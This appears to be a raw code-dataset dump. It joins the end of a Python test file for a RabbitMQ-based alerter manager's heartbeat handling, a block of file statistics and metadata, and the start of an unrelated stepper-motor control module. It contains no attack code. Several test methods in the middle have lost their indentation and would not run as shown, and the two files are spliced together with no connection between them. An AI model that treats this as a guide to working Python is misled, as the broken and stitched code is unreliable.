        # routing key as the ones sent by send_heartbeat, and checks that the
        # received heartbeat is valid.
        mock_ack.return_value = None
        # One is_alive result per managed process
        mock_is_alive.side_effect = [True, True]
        mock_start.return_value = None
        mock_join.return_value = None
        mock_terminate.return_value = None
        mock_push_and_send.return_value = None
        try:
            self.test_manager._initialise_rabbitmq()
            blocking_channel = self.test_manager.rabbitmq.channel
            method_chains = pika.spec.Basic.Deliver(
                routing_key=self.chains_routing_key)
            method_general = pika.spec.Basic.Deliver(
                routing_key=self.general_routing_key)
            body_chain_initial = json.dumps(
                self.sent_configs_example_with_default)
            body_general_initial = json.dumps(
                self.sent_configs_example_with_default_2)
            properties = pika.spec.BasicProperties()
            # First send the new configs as the state is empty
            self.test_manager._process_configs(blocking_channel, method_chains,
                                               properties, body_chain_initial)
            self.test_manager._process_configs(blocking_channel, method_general,
                                               properties, body_general_initial)
            # Delete the queue before to avoid messages in the queue on error.
            self.test_manager.rabbitmq.queue_delete(self.test_queue_name)
            # initialise
            method_hb = pika.spec.Basic.Deliver(
                routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
            body = 'ping'
            res = self.test_manager.rabbitmq.queue_declare(
                queue=self.test_queue_name, durable=True, exclusive=False,
                auto_delete=False, passive=False
            )
            self.assertEqual(0, res.method.message_count)
            self.test_manager.rabbitmq.queue_bind(
                queue=self.test_queue_name, exchange=HEALTH_CHECK_EXCHANGE,
                routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
            self.test_manager._process_ping(blocking_channel, method_hb,
                                            properties, body)
            # By re-declaring the queue again we can get the number of messages
            # in the queue.
            res = self.test_manager.rabbitmq.queue_declare(
                queue=self.test_queue_name, durable=True, exclusive=False,
                auto_delete=False, passive=True
            )
            self.assertEqual(1, res.method.message_count)
            # Check that the message received is a valid HB
            _, _, body = self.test_manager.rabbitmq.basic_get(
                self.test_queue_name)
            # freeze_time pins the timestamp so it can be compared exactly.
            expected_output = {
                'component_name': self.test_manager.name,
                'running_processes':
                    [self.test_manager.parent_id_process_dict[self.parent_id_1][
                         'component_name'],
                     self.test_manager.parent_id_process_dict[self.parent_id_2][
                         'component_name']],
                'dead_processes': [],
                'timestamp': datetime(2012, 1, 1).timestamp(),
            }
            self.assertEqual(expected_output, json.loads(body))
        except Exception as e:
            self.fail("Test failed: {}".format(e))
    @freeze_time("2012-01-01")
    @mock.patch.object(SystemAlertersManager,
                       "_push_latest_data_to_queue_and_send")
    @mock.patch.object(RabbitMQApi, "basic_ack")
    @mock.patch.object(multiprocessing.Process, "is_alive")
    @mock.patch.object(multiprocessing.Process, "start")
    @mock.patch.object(multiprocessing.Process, "join")
    @mock.patch.object(multiprocessing.Process, "terminate")
    def test_process_ping_sends_a_valid_hb_if_some_processes_alive_some_dead(
            self, mock_terminate, mock_join, mock_start, mock_is_alive,
            mock_ack, mock_push_and_send) -> None:
        """One alerter process alive, one dead -> heartbeat lists each under
        the matching key.
        """
        # This test creates a queue which receives messages with the same
        # routing key as the ones sent by send_heartbeat, and checks that the
        # received heartbeat is valid.
        mock_ack.return_value = None
        # First process alive, second process dead
        mock_is_alive.side_effect = [True, False]
        mock_start.return_value = None
        mock_join.return_value = None
        mock_terminate.return_value = None
        mock_push_and_send.return_value = None
        try:
            self.test_manager._initialise_rabbitmq()
            blocking_channel = self.test_manager.rabbitmq.channel
            method_chains = pika.spec.Basic.Deliver(
                routing_key=self.chains_routing_key)
            method_general = pika.spec.Basic.Deliver(
                routing_key=self.general_routing_key)
            body_chain_initial = json.dumps(
                self.sent_configs_example_with_default)
            body_general_initial = json.dumps(
                self.sent_configs_example_with_default_2)
            properties = pika.spec.BasicProperties()
            # First send the new configs as the state is empty
            self.test_manager._process_configs(blocking_channel, method_chains,
                                               properties, body_chain_initial)
            self.test_manager._process_configs(blocking_channel, method_general,
                                               properties, body_general_initial)
            # Delete the queue before to avoid messages in the queue on error.
            self.test_manager.rabbitmq.queue_delete(self.test_queue_name)
            # initialise
            method_hb = pika.spec.Basic.Deliver(
                routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
            body = 'ping'
            res = self.test_manager.rabbitmq.queue_declare(
                queue=self.test_queue_name, durable=True, exclusive=False,
                auto_delete=False, passive=False
            )
            self.assertEqual(0, res.method.message_count)
            self.test_manager.rabbitmq.queue_bind(
                queue=self.test_queue_name, exchange=HEALTH_CHECK_EXCHANGE,
                routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
            self.test_manager._process_ping(blocking_channel, method_hb,
                                            properties, body)
            # By re-declaring the queue again we can get the number of messages
            # in the queue.
            res = self.test_manager.rabbitmq.queue_declare(
                queue=self.test_queue_name, durable=True, exclusive=False,
                auto_delete=False, passive=True
            )
            self.assertEqual(1, res.method.message_count)
            # Check that the message received is a valid HB
            _, _, body = self.test_manager.rabbitmq.basic_get(
                self.test_queue_name)
            # freeze_time pins the timestamp so it can be compared exactly.
            expected_output = {
                'component_name': self.test_manager.name,
                'running_processes':
                    [self.test_manager.parent_id_process_dict[self.parent_id_1][
                         'component_name']],
                'dead_processes': [self.test_manager.parent_id_process_dict[
                    self.parent_id_2]['component_name']],
                'timestamp': datetime(2012, 1, 1).timestamp(),
            }
            self.assertEqual(expected_output, json.loads(body))
        except Exception as e:
            self.fail("Test failed: {}".format(e))
    @freeze_time("2012-01-01")
    @mock.patch.object(SystemAlertersManager,
                       "_push_latest_data_to_queue_and_send")
    @mock.patch.object(RabbitMQApi, "basic_ack")
    @mock.patch.object(multiprocessing.Process, "is_alive")
    @mock.patch.object(multiprocessing.Process, "start")
    @mock.patch.object(multiprocessing.Process, "join")
    @mock.patch.object(multiprocessing.Process, "terminate")
    def test_process_ping_sends_a_valid_hb_if_all_processes_dead(
            self, mock_terminate, mock_join, mock_start, mock_is_alive,
            mock_ack, mock_push_and_send) -> None:
        """Both alerter processes report dead -> heartbeat lists both as dead
        and none as running.
        """
        # This test creates a queue which receives messages with the same
        # routing key as the ones sent by send_heartbeat, and checks that the
        # received heartbeat is valid.
        mock_ack.return_value = None
        # Both processes report dead
        mock_is_alive.side_effect = [False, False]
        mock_start.return_value = None
        mock_join.return_value = None
        mock_terminate.return_value = None
        mock_push_and_send.return_value = None
        try:
            self.test_manager._initialise_rabbitmq()
            blocking_channel = self.test_manager.rabbitmq.channel
            method_chains = pika.spec.Basic.Deliver(
                routing_key=self.chains_routing_key)
            method_general = pika.spec.Basic.Deliver(
                routing_key=self.general_routing_key)
            body_chain_initial = json.dumps(
                self.sent_configs_example_with_default)
            body_general_initial = json.dumps(
                self.sent_configs_example_with_default_2)
            properties = pika.spec.BasicProperties()
            # First send the new configs as the state is empty
            self.test_manager._process_configs(blocking_channel, method_chains,
                                               properties, body_chain_initial)
            self.test_manager._process_configs(blocking_channel, method_general,
                                               properties, body_general_initial)
            # Delete the queue before to avoid messages in the queue on error.
            self.test_manager.rabbitmq.queue_delete(self.test_queue_name)
            # initialise
            method_hb = pika.spec.Basic.Deliver(
                routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
            body = 'ping'
            res = self.test_manager.rabbitmq.queue_declare(
                queue=self.test_queue_name, durable=True, exclusive=False,
                auto_delete=False, passive=False
            )
            self.assertEqual(0, res.method.message_count)
            self.test_manager.rabbitmq.queue_bind(
                queue=self.test_queue_name, exchange=HEALTH_CHECK_EXCHANGE,
                routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
            self.test_manager._process_ping(blocking_channel, method_hb,
                                            properties, body)
            # By re-declaring the queue again we can get the number of messages
            # in the queue.
            res = self.test_manager.rabbitmq.queue_declare(
                queue=self.test_queue_name, durable=True, exclusive=False,
                auto_delete=False, passive=True
            )
            self.assertEqual(1, res.method.message_count)
            # Check that the message received is a valid HB
            _, _, body = self.test_manager.rabbitmq.basic_get(
                self.test_queue_name)
            # freeze_time pins the timestamp so it can be compared exactly.
            expected_output = {
                'component_name': self.test_manager.name,
                'running_processes': [],
                'dead_processes':
                    [self.test_manager.parent_id_process_dict[self.parent_id_1][
                         'component_name'],
                     self.test_manager.parent_id_process_dict[self.parent_id_2][
                         'component_name']],
                'timestamp': datetime(2012, 1, 1).timestamp(),
            }
            self.assertEqual(expected_output, json.loads(body))
        except Exception as e:
            self.fail("Test failed: {}".format(e))
    @freeze_time("2012-01-01")
    @mock.patch.object(SystemAlertersManager,
                       "_push_latest_data_to_queue_and_send")
    @mock.patch.object(RabbitMQApi, "basic_ack")
    @mock.patch("src.alerter.alerter_starters.create_logger")
    @mock.patch.object(SystemAlertersManager, "_send_heartbeat")
    def test_process_ping_restarts_dead_processes(
            self, send_hb_mock, mock_create_logger, mock_ack,
            mock_push_and_send) -> None:
        """End-to-end check: actually start alerter processes, kill them, and
        verify that _process_ping restarts them.
        """
        send_hb_mock.return_value = None
        mock_create_logger.return_value = self.dummy_logger
        mock_ack.return_value = None
        mock_push_and_send.return_value = None
        try:
            self.test_manager.rabbitmq.connect()
            blocking_channel = self.test_manager.rabbitmq.channel
            method_chains = pika.spec.Basic.Deliver(
                routing_key=self.chains_routing_key)
            method_general = pika.spec.Basic.Deliver(
                routing_key=self.general_routing_key)
            body_chain_initial = json.dumps(
                self.sent_configs_example_with_default)
            body_general_initial = json.dumps(
                self.sent_configs_example_with_default_2)
            properties = pika.spec.BasicProperties()
            # First send the new configs as the state is empty
            self.test_manager._process_configs(blocking_channel, method_chains,
                                               properties, body_chain_initial)
            self.test_manager._process_configs(blocking_channel, method_general,
                                               properties, body_general_initial)
            # Give time for the processes to start
            time.sleep(1)
            # Automate the case when having all processes dead
            self.test_manager.parent_id_process_dict[self.parent_id_1][
                'process'].terminate()
            self.test_manager.parent_id_process_dict[self.parent_id_1][
                'process'].join()
            self.test_manager.parent_id_process_dict[self.parent_id_2][
                'process'].terminate()
            self.test_manager.parent_id_process_dict[self.parent_id_2][
                'process'].join()
            # Give time for the processes to terminate
            time.sleep(1)
            # Check that that the processes have terminated
            self.assertFalse(self.test_manager.parent_id_process_dict[
                                 self.parent_id_1]['process'].is_alive())
            self.assertFalse(self.test_manager.parent_id_process_dict[
                                 self.parent_id_2]['process'].is_alive())
            # initialise
            method_hb = pika.spec.Basic.Deliver(
                routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
            body = 'ping'
            self.test_manager._process_ping(blocking_channel, method_hb,
                                            properties, body)
            # Give time for the processes to start
            time.sleep(1)
            # The ping handler must have restarted both dead processes
            self.assertTrue(
                self.test_manager.parent_id_process_dict[self.parent_id_1][
                    'process'].is_alive())
            self.assertTrue(
                self.test_manager.parent_id_process_dict[self.parent_id_2][
                    'process'].is_alive())
            # Clean before test finishes
            self.test_manager.parent_id_process_dict[self.parent_id_1][
                'process'].terminate()
            self.test_manager.parent_id_process_dict[self.parent_id_1][
                'process'].join()
            self.test_manager.parent_id_process_dict[self.parent_id_2][
                'process'].terminate()
            self.test_manager.parent_id_process_dict[self.parent_id_2][
                'process'].join()
        except Exception as e:
            self.fail("Test failed: {}".format(e))
@mock.patch.object(SystemAlertersManager,
"_push_latest_data_to_queue_and_send")
@mock.patch.object(SystemAlertersManager, "_send_heartbeat")
@mock.patch.object(SystemAlertersManager,
"_create_and_start_alerter_process")
@mock.patch.object(multiprocessing.Process, "join")
@mock.patch.object(multiprocessing.Process, "is_alive")
def test_process_ping_restarts_dead_processes_with_correct_info(
self, mock_alive, mock_join, startup_mock, send_hb_mock,
mock_push_and_send) -> None:
send_hb_mock.return_value = None
startup_mock.return_value = None
mock_alive.return_value = False
mock_join.return_value = None
mock_push_and_send.return_value = None
try:
self.test_manager.rabbitmq.connect()
self.test_manager._systems_alerts_configs[self.parent_id_1] = \
self.system_alerts_config
self.test_manager._systems_alerts_configs[self.parent_id_2] = \
self.system_alerts_config_2
self.test_manager._parent_id_process_dict = \
self.config_process_dict_example
# initialise
blocking_channel = self.test_manager.rabbitmq.channel
method = pika.spec.Basic.Deliver(
routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
properties = pika.spec.BasicProperties()
body = 'ping'
self.test_manager._process_ping(blocking_channel, method,
properties, body)
self.assertEqual(2, startup_mock.call_count)
call_1 = call(
self.test_manager.systems_alerts_configs[self.parent_id_1],
self.parent_id_1, self.chain_1)
call_2 = call(
self.test_manager.systems_alerts_configs[self.parent_id_2],
self.parent_id_2, self.chain_2)
startup_mock.assert_has_calls([call_1, call_2])
except Exception as e:
self.fail("Test failed: {}".format(e))
    @mock.patch.object(multiprocessing.Process, "is_alive")
    @mock.patch.object(multiprocessing.Process, "start")
    @mock.patch.object(multiprocessing, 'Process')
    def test_process_ping_does_not_send_hb_if_processing_fails(
            self, mock_process, mock_start, is_alive_mock) -> None:
        """No heartbeat is published when ping processing raises."""
        # This test creates a queue which receives messages with the same
        # routing key as the ones sent by send_heartbeat. In this test we will
        # check that no heartbeat is sent when mocking a raised exception.
        is_alive_mock.side_effect = self.test_exception
        mock_start.return_value = None
        mock_process.side_effect = self.dummy_process1
        try:
            self.test_manager._initialise_rabbitmq()
            # Delete the queue before to avoid messages in the queue on error.
            self.test_manager.rabbitmq.queue_delete(self.test_queue_name)
            self.test_manager._systems_alerts_configs[self.parent_id_1] = \
                self.system_alerts_config
            self.test_manager._systems_alerts_configs[self.parent_id_2] = \
                self.system_alerts_config_2
            self.test_manager._parent_id_process_dict = \
                self.config_process_dict_example
            # initialise
            blocking_channel = self.test_manager.rabbitmq.channel
            method = pika.spec.Basic.Deliver(
                routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
            properties = pika.spec.BasicProperties()
            body = 'ping'
            res = self.test_manager.rabbitmq.queue_declare(
                queue=self.test_queue_name, durable=True, exclusive=False,
                auto_delete=False, passive=False
            )
            self.assertEqual(0, res.method.message_count)
            self.test_manager.rabbitmq.queue_bind(
                queue=self.test_queue_name, exchange=HEALTH_CHECK_EXCHANGE,
                routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
            self.test_manager._process_ping(blocking_channel, method,
                                            properties, body)
            # By re-declaring the queue again we can get the number of messages
            # in the queue.
            res = self.test_manager.rabbitmq.queue_declare(
                queue=self.test_queue_name, durable=True, exclusive=False,
                auto_delete=False, passive=True
            )
            # Still 0: the failed ping processing must not publish a heartbeat
            self.assertEqual(0, res.method.message_count)
        except Exception as e:
            self.fail("Test failed: {}".format(e))
def test_proc_ping_send_hb_does_not_raise_msg_not_del_exce_if_hb_not_routed(
self) -> None:
try:
self.test_manager._initialise_rabbitmq()
# initialise
blocking_channel = self.test_manager.rabbitmq.channel
method = pika.spec.Basic.Deliver(
routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
properties = pika.spec.BasicProperties()
body = 'ping'
self.test_manager._process_ping(blocking_channel, method,
properties, body)
except Exception as e:
self.fail("Test failed: {}".format(e))
@mock.patch.object(SystemAlertersManager, "_send_heartbeat")
def test_process_ping_send_hb_raises_amqp_connection_err_on_connection_err(
self, hb_mock) -> None:
hb_mock.side_effect = pika.exceptions.AMQPConnectionError('test')
try:
self.test_manager._initialise_rabbitmq()
# initialise
blocking_channel = self.test_manager.rabbitmq.channel
method = pika.spec.Basic.Deliver(
routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
properties = pika.spec.BasicProperties()
body = 'ping'
self.assertRaises(pika.exceptions.AMQPConnectionError,
self.test_manager._process_ping, blocking_channel,
method, properties, body)
except Exception as e:
self.fail("Test failed: {}".format(e))
@mock.patch.object(SystemAlertersManager, "_send_heartbeat")
def test_process_ping_send_hb_raises_amqp_chan_err_on_chan_err(
self, hb_mock) -> None:
hb_mock.side_effect = pika.exceptions.AMQPChannelError('test')
try:
self.test_manager._initialise_rabbitmq()
# initialise
blocking_channel = self.test_manager.rabbitmq.channel
method = pika.spec.Basic.Deliver(
routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
properties = pika.spec.BasicProperties()
body = 'ping'
self.assertRaises(pika.exceptions.AMQPChannelError,
self.test_manager._process_ping, blocking_channel,
method, properties, body)
except Exception as e:
self.fail("Test failed: {}".format(e))
@mock.patch.object(SystemAlertersManager, "_send_heartbeat")
def test_process_ping_send_hb_raises_exception_on_unexpected_exception(
self, hb_mock) -> None:
hb_mock.side_effect = self.test_exception
try:
self.test_manager._initialise_rabbitmq()
# initialise
blocking_channel = self.test_manager.rabbitmq.channel
method = pika.spec.Basic.Deliver(
routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
properties = pika.spec.BasicProperties()
body = 'ping'
self.assertRaises(PANICException, self.test_manager._process_ping,
blocking_channel, method, properties, body)
except Exception as e:
self.fail("Test failed: {}".format(e))
| 47.855464
| 85
| 0.631393
| 9,284
| 81,450
| 5.162753
| 0.042546
| 0.043229
| 0.068536
| 0.039828
| 0.877136
| 0.859548
| 0.837245
| 0.820325
| 0.800275
| 0.789051
| 0
| 0.007212
| 0.298588
| 81,450
| 1,701
| 86
| 47.883598
| 0.83177
| 0.084481
| 0
| 0.744322
| 0
| 0
| 0.046873
| 0.01714
| 0
| 0
| 0
| 0
| 0.071062
| 1
| 0.023443
| false
| 0.009524
| 0.017582
| 0
| 0.041758
| 0.000733
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6a4972f167a0a0247df433a711635da80c74b219
| 30,493
|
py
|
Python
|
pingpong/operations/stepper/stepperoperationbase.py
|
navyzal/PointTracking_Gesture
|
8210aa83dcbe35db62d2578f430d3397c8cfe10d
|
[
"Apache-2.0"
] | 13
|
2021-08-02T04:16:18.000Z
|
2022-02-24T18:37:57.000Z
|
pingpong/operations/stepper/stepperoperationbase.py
|
navyzal/PointTracking_Gesture
|
8210aa83dcbe35db62d2578f430d3397c8cfe10d
|
[
"Apache-2.0"
] | null | null | null |
pingpong/operations/stepper/stepperoperationbase.py
|
navyzal/PointTracking_Gesture
|
8210aa83dcbe35db62d2578f430d3397c8cfe10d
|
[
"Apache-2.0"
] | 16
|
2021-08-02T15:33:56.000Z
|
2022-03-28T14:23:37.000Z
|
from protocols.generateprotocol import GenerateProtocol
from operations.stepper.stepperoperationutils import StepperOperationUtils
import time
class StepperOperationBase():
    """Common base for stepper-motor operation classes.

    Holds the protocol generator plus the shared robot-status structure and
    controller callbacks, and provides attribute-style access to the nested
    robot status (robot_status[group_id].<status>.<variable>).
    """

    def __init__(self, number, group_id, robot_status, start_check, write):
        self._GenerateProtocolInstance = GenerateProtocol(number, group_id)
        self._robot_status = robot_status
        # Callback invoked before any motor command is issued
        self._start_check_copy = start_check
        # Callback that writes protocol bytes to the controller
        self._write_copy = write

    ### Read a value from robot_status
    def _get_robot_status(self, group_id, status, variable):
        """Return robot_status[group_id].<status>.<variable>."""
        # getattr instead of the previous string-built eval(): safer, faster,
        # and works for any group_id key type.
        return getattr(getattr(self._robot_status[group_id], status), variable)

    ### Write a value into robot_status
    def _set_robot_status(self, group_id, status, variable, value):
        """Set robot_status[group_id].<status>.<variable> = value."""
        # setattr instead of the previous exec(): the old code interpolated
        # `value` unquoted into source text, so assigning a string value
        # (e.g. "continue") raised NameError; setattr handles any value.
        setattr(getattr(self._robot_status[group_id], status), variable, value)
class ContinuousStepperOperation(StepperOperationBase):
    """Stepper operation that runs motors continuously until told otherwise."""

    def __init__(self, number, group_id, robot_status, start_check, write):
        StepperOperationBase.__init__(self, number, group_id, robot_status, start_check, write)

    ### Run motors in continuous mode
    def run_motor_continue(self,
                           cube_ID_list="all",
                           speed_list=None,
                           pause_list=False,
                           group_id=None,
                           speed_option="RPM",
                           wait=0) -> None:
        """Send a continuous-run command to the selected cubes.

        cube_ID_list selects the target cubes ("all" or explicit ids);
        speed_list gives per-cube speeds interpreted per speed_option;
        pause_list pauses motors; wait sleeps after sending the command.
        """
        group_id = StepperOperationUtils.proc_group_id(self._GenerateProtocolInstance._group_id, group_id)
        ### Number of connected controllers
        connection_number = self._robot_status[group_id].controller_status.connection_number
        ### Start check
        self._start_check_copy()
        ### Normalise cube_ID, speed and pause into lists
        cube_ID_list = StepperOperationUtils().to_list(cube_ID_list)
        speed_list = StepperOperationUtils().to_list(speed_list)
        pause_list = StepperOperationUtils().to_list(pause_list)
        ### Process the cube ID list
        cube_ID_list = StepperOperationUtils().process_cube_ID_list(cube_ID_list, connection_number)
        ### Determine run_number
        run_number = StepperOperationUtils().set_run_number(cube_ID_list, connection_number)
        ### Validate the pause list
        StepperOperationUtils().check_pause_list(pause_list)
        ### Validate the speed option
        StepperOperationUtils().check_speed_option(speed_option)
        ### Validate wait
        StepperOperationUtils().check_wait(wait, run_option="continue")
        ### Apply defaults
        speed_list = StepperOperationUtils().set_default(input_list=[speed_list], option_list=[speed_option], run_option="continue")
        ### Length checks for speed and pause
        StepperOperationUtils().len_check(speed_list, cube_ID_list, connection_number, mode_name="continue", list_name="speed_list", run_number=run_number, run_option="continue")
        StepperOperationUtils().len_check(pause_list, cube_ID_list, connection_number, mode_name="continue", list_name="pause_list", run_number=run_number, run_option="continue")
        ### Clamp speeds
        speed_list, _ = StepperOperationUtils().limit_speed(speed_list, speed_option, run_number, sync=False, run_option="continue")
        ### Expand to byte-level lists
        cube_ID_list, speed_list, pause_list = StepperOperationUtils().expand_bytes(cube_ID_list, connection_number, run_number, speed_list, pause_list)
        ### Build and send the command
        sending_bytes = b""
        for i, cube_ID_element in enumerate(cube_ID_list):
            ### Force pause on zero speed
            if speed_list[i] == 0:
                pause_list[i] = True  # if 0 isn't sent as pause, the next command is ignored
            ### Record status
            self._robot_status[group_id].controller_status.stepper_mode[cube_ID_element] = "continue"
            self._robot_status[group_id].controller_status.stepper_speed[cube_ID_element] = speed_list[i]
            self._robot_status[group_id].controller_status.stepper_pause[cube_ID_element] = pause_list[i]
            ### Append command bytes
            sending_bytes += self._GenerateProtocolInstance.SetContinuousSteps_bytes(cube_ID_element, speed_list[i], group_id, pause_list[i])
        ### Wrap as an aggregate command when multiple controllers are connected
        if connection_number > 1:
            sending_bytes = self._GenerateProtocolInstance.SetAggregateSteps_bytes(group_id, sending_bytes)
        ### Write the bytes
        self._write_copy(sending_bytes)
        ### Block until the aggregate setting is acknowledged
        StepperOperationUtils().wait_until_agg_set(self._get_robot_status, self._set_robot_status, group_id, connection_number)
        ### sleep
        if wait != 0:
            time.sleep(wait + 0.3)
        time.sleep(0.2)
class SingleStepsStepperOperation(StepperOperationBase):
    """Stepper operation that runs motors for a fixed number of steps."""

    def __init__(self, number, group_id, robot_status, start_check, write):
        StepperOperationBase.__init__(self, number, group_id, robot_status, start_check, write)

    ### Run motors in step mode
    def run_motor_step(self,
                       cube_ID_list="all",
                       speed_list=None,
                       step_list=None,
                       pause_list=False,
                       time_list=None,
                       group_id=None,
                       speed_option="RPM",
                       step_option="CYCLE",
                       sync=False,
                       time_option=None,
                       wait=0) -> None:
        """Send a fixed-step run command to the selected cubes.

        time_option branches the computation: None uses speed/step lists
        directly; "speed" derives steps from time_list and speed_list;
        "step" derives speeds from time_list and step_list.
        """
        group_id = StepperOperationUtils.proc_group_id(self._GenerateProtocolInstance._group_id, group_id)
        ### Number of connected controllers
        connection_number = self._robot_status[group_id].controller_status.connection_number
        ### Start check
        self._start_check_copy()
        ### Normalise cube_ID, speed, step and pause into lists
        cube_ID_list = StepperOperationUtils().to_list(cube_ID_list)
        speed_list = StepperOperationUtils().to_list(speed_list)
        step_list = StepperOperationUtils().to_list(step_list)
        pause_list = StepperOperationUtils().to_list(pause_list)
        ### Process the cube ID list
        cube_ID_list = StepperOperationUtils().process_cube_ID_list(cube_ID_list, connection_number)
        ### Determine run_number
        run_number = StepperOperationUtils().set_run_number(cube_ID_list, connection_number)
        ### Validate the pause list
        StepperOperationUtils().check_pause_list(pause_list)
        ### Validate the speed option
        StepperOperationUtils().check_speed_option(speed_option)
        ### Validate the step option
        StepperOperationUtils().check_step_option(step_option)
        ### Validate the sync option
        StepperOperationUtils().check_sync_option(sync)
        ### Validate & normalise the time option
        time_option = StepperOperationUtils().check_time_option(time_option)
        ### Validate wait
        StepperOperationUtils().check_wait(wait, run_option="step")
        ### Apply defaults
        speed_list, step_list = StepperOperationUtils().set_default(input_list=[speed_list, step_list], option_list=[speed_option, step_option], run_option="step")
        ### Branch on the time option
        ### No time option
        if time_option.lower() == "none":
            ### Length checks for speed and step
            StepperOperationUtils().len_check(speed_list, cube_ID_list, connection_number, mode_name="step", list_name="speed_list", run_number=run_number, run_option="step")
            StepperOperationUtils().len_check(step_list, cube_ID_list, connection_number, mode_name="step", list_name="step_list", run_number=run_number, run_option="step")
            ### Clamp speed and step
            speed_list, sleep_list = StepperOperationUtils().limit_speed(speed_list, speed_option, run_number, sync, run_option="step")
            step_list, speed_list = StepperOperationUtils().limit_step(step_list, speed_list, sleep_list, step_option, run_number, sync, run_option="step")
        ### time option: speed mode
        elif time_option.lower() == "speed":
            ### Length checks for time and speed
            StepperOperationUtils().len_check(time_list, cube_ID_list, connection_number, mode_name="step and time-speed", list_name="time_list", run_number=run_number, run_option="step")
            StepperOperationUtils().len_check(speed_list, cube_ID_list, connection_number, mode_name="step and time-speed", list_name="speed_list", run_number=run_number, run_option="step")
            ### Convert times; clamp speed and step
            speed_list, sleep_list = StepperOperationUtils().limit_speed(speed_list, speed_option, run_number, sync, run_option="step")
            step_list, _, speed_option, step_option = StepperOperationUtils().convert_time_list(time_list, speed_list, step_list=None, speed_option=speed_option, step_option=None, run_number=run_number, sync=sync, run_option="step", time_option="speed")
            step_list, speed_list = StepperOperationUtils().limit_step(step_list, speed_list, sleep_list, step_option="STEP", run_number=run_number, sync=sync, run_option="step")
        ### time option: step mode
        elif time_option.lower() == "step":
            ### Length checks for time and step
            StepperOperationUtils().len_check(time_list, cube_ID_list, connection_number, mode_name="step and time-step", list_name="time_list", run_number=run_number, run_option="step")
            StepperOperationUtils().len_check(step_list, cube_ID_list, connection_number, mode_name="step and time-step", list_name="step_list", run_number=run_number, run_option="step")
            ### Convert times; clamp speed and step
            speed_list, step_list, speed_option, step_option = StepperOperationUtils().convert_time_list(time_list, speed_list=None, step_list=step_list, speed_option=None, step_option=step_option, run_number=run_number, sync=sync, run_option="step", time_option="step")
            speed_list, sleep_list = StepperOperationUtils().limit_speed(speed_list, speed_option, run_number, sync, run_option="step")
            step_list, speed_list = StepperOperationUtils().limit_step(step_list, speed_list, sleep_list, step_option="STEP", run_number=run_number, sync=sync, run_option="step")
        ### Length check for pause
        StepperOperationUtils().len_check(pause_list, cube_ID_list, connection_number, mode_name="step", list_name="pause_list", run_number=run_number, run_option="step")
        ### Expand to byte-level lists
        cube_ID_list, speed_list, step_list, pause_list = StepperOperationUtils().expand_bytes(cube_ID_list, connection_number, run_number, speed_list, step_list, pause_list)
        ### Handle sync mode
        speed_list, step_list = StepperOperationUtils().check_time_sync_none(speed_list, step_list, sync, run_number, run_option="step")
        ### Convert wait (if wait is "step" or "schedule", compute it for the current run_option)
        if isinstance(wait, str):
            wait = StepperOperationUtils().convert_wait(speed_list, step_list, pause_list, run_option="step")
        ### Build and send the command (TODO: group_id handling still needed)
        sending_bytes = b""
        for i, cube_ID_element in enumerate(cube_ID_list):
            ### Record status
            self._robot_status[group_id].controller_status.stepper_mode[cube_ID_element] = "step"
            self._robot_status[group_id].controller_status.stepper_speed[cube_ID_element] = speed_list[i]
            self._robot_status[group_id].controller_status.stepper_step[cube_ID_element] = step_list[i]
            self._robot_status[group_id].controller_status.stepper_pause[cube_ID_element] = pause_list[i]
            ### Append command bytes
            sending_bytes += self._GenerateProtocolInstance.SetSingleSteps_bytes(cube_ID_element, speed_list[i], step_list[i], group_id, pause_list[i])
        # Wrap as an aggregate command when multiple controllers are connected
        if connection_number > 1:
            sending_bytes = self._GenerateProtocolInstance.SetAggregateSteps_bytes(group_id, sending_bytes)
        ### Write the bytes
        self._write_copy(sending_bytes)
        ### Block until the aggregate setting is acknowledged
        StepperOperationUtils().wait_until_agg_set(self._get_robot_status, self._set_robot_status, group_id, connection_number)
        ### sleep
        if wait != 0:
            time.sleep(wait + 0.3)
        time.sleep(0.2)
class ScheduledStepsStepperOperation(StepperOperationBase):
    """Upload a full speed/step schedule to the steppers and play it once.

    The schedule is sent with ``SetScheduledSteps_bytes`` and then triggered
    by a single ``SetScheduledPoints_bytes`` command that covers the whole
    schedule (start index 0, end index = last entry, repeat 1).
    """
    def __init__(self, number, group_id, robot_status, start_check, write):
        StepperOperationBase.__init__(self, number, group_id, robot_status, start_check, write)
    ### run motors in schedule mode
    def run_motor_schedule(self,
                           cube_ID_list="all",
                           speed_list=None,
                           step_list=None,
                           pause_list=False,
                           time_list=None,
                           group_id=None,
                           speed_option="RPM",
                           step_option="CYCLE",
                           sync=False,
                           time_option=None,
                           wait=0) -> None:
        """Validate inputs, upload the schedule, then run it from start to end.

        ``time_option`` selects which pair of lists drives the schedule:
        "none" (speed + step), "speed" (time + speed) or "step" (time + step).
        ``wait`` may be a number of seconds, or a string which is converted to
        an estimated run time by ``convert_wait``.
        """
        group_id = StepperOperationUtils.proc_group_id(self._GenerateProtocolInstance._group_id, group_id)
        ### number of connected cubes
        connection_number = self._robot_status[group_id].controller_status.connection_number
        ### start check
        self._start_check_copy()
        ### normalize cube_ID, speed, step, time, pause into lists
        cube_ID_list = StepperOperationUtils().to_list(cube_ID_list)
        speed_list = StepperOperationUtils().to_list(speed_list)
        step_list = StepperOperationUtils().to_list(step_list)
        time_list = StepperOperationUtils().to_list(time_list)
